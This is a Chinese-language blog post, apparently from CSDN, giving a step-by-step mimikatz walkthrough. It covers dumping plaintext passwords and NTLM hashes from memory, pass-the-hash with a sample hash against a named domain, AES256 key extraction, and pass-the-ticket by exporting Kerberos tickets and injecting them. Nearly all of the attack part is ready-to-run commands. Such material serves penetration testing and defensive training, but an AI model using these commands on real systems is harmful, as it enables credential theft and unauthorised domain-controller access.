mimikatz使用哈希 ntlm传递 票据传递

(1)管理员运行

(2)必须输入

privilege::debug

在这里插入图片描述
(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码

sekurlsa::logonpasswords
在这里插入图片描述
(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043

mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
在这里插入图片描述
(5) aes-256密钥

使用 mimikatz抓取密钥

sekurlsa::ekeys

在这里插入图片描述

获取到 aes-25后

sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”

需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。

票据传递

privilege::debug
sekurlsa::tickets /export

执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等

在这里插入图片描述

使用以下命令 清楚 内存中的票据

kerberos::purge

将票据文件注入内存

kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”

“文件名”

在当前终端 退出 mimikatz 然后就可以列出目标目录啦。

除了mimikatz工具 还可以用 kekeo传递票据。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值